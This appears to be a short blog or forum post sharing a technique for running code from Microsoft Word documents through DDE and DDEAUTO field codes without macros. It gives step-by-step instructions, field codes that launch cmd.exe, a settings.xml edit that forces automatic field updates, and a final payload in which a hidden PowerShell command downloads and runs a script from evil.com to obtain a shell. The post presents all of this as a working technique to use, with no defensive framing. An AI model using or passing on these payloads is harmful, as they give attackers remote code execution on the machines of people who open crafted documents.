Today I learned a new way to get code execution from Word that does not require enabling macros, so I am sharing it with everyone. The steps are also very simple.
First create a new Word document and insert a field, selecting "= (Formula)". Right-click the field and choose "Toggle Field Codes", then change the field code to:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }
After that, right-click and choose "Update Field", then save the file in docx format. The final result is as follows:
A somewhat awkward detail is that it only executes afterwards.
Besides DDEAUTO, DDE can also be used, as follows:

{DDE "c:\\windows\\system32\\cmd.exe" "/c notepad" }
Note that with DDE the field is not updated automatically; you need to modify the document: rename it to .rar, open it, and edit word/settings.xml to add:

<w:updateFields w:val="true"/>
The effect when using DDE is as follows:
Personally, I feel DDE is a little nicer to use.
How to get an interactive shell?

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evil.com/evil.ps1');powershell -e $e "} 